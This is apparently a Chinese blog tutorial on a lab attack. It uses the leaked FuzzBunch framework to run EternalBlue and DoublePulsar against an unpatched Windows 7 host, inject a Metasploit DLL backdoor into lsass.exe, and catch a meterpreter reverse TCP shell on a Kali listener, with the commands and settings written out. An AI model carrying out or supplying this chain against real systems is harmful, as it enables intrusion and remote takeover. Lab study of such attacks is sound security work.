ShadowBroker攻击框架FuzzBunch实战之EternalBlue

环境准备：

IP地址角色操作系统必需依赖备注192.168.119.164靶机Win7 SP1 64-bits\关闭防火墙，保证没有2017年微软系统补丁192.168.119.153攻击机（主）WinXP SP3 32-bitsPython2.6.6和pywin32安装包python 2.6别太老，否则没有Scripts目录安装pywin32模块192.168.119.152攻击机（辅助）kali1-amd64\用来生成payload,这里主要是使用msf生成的dll后门

攻击方法：

在xp上用命令行进入fb.py所在的目录，运行fuzzbunch.

C:\Documents and Settings\Administrator>cd c:\TDDOWNLOAD\master\shadowbroker-master\windows\C:\TDDOWNLOAD\master\shadowbroker-master\windows>python fb.py
1
2
3

设置全局参数

1. Default Target IP Address（默认靶机IP）: 192.168.119.164
2. Default Callback IP Address（默认监控主机IP）: 192.168.119.152
3. Use Redirection（使用重定向）: no
4. Set LogDir（设置日志路径）: c:\logs\

使用EternalBlue攻击靶机，这里需要注意的是，事先要确定靶机的操作系统，这个类型要做选择。

另外就是攻击方式，需要选择FB

生成反弹shell用的dll文件

使用DoublePulsar攻击靶机 
这次要准备攻击负载，这里使用的是dll反弹shell。与EternalBlue一样，需要选择靶机系统类型。

切记， ProcessName [lsass.exe]者一项是默认，否则无法运行后门。

进入Kali，开启监听 
监听shell的主机要在反弹shell前启动才能收到反弹的shell。

use exploit/multi/Display all 234 possibilities? (y or n)msf > use exploit/multi/handler msf exploit(handler) > set LHOST 192.168.119.152LHOST => 192.168.119.152msf exploit(handler) > set LPORT 8089LPORT => 8089msf exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcpPAYLOAD => windows/x64/meterpreter/reverse_tcpmsf exploit(handler) > exploit 
1
2
3
4
5
6
7
8
9
10

攻击成功效果图：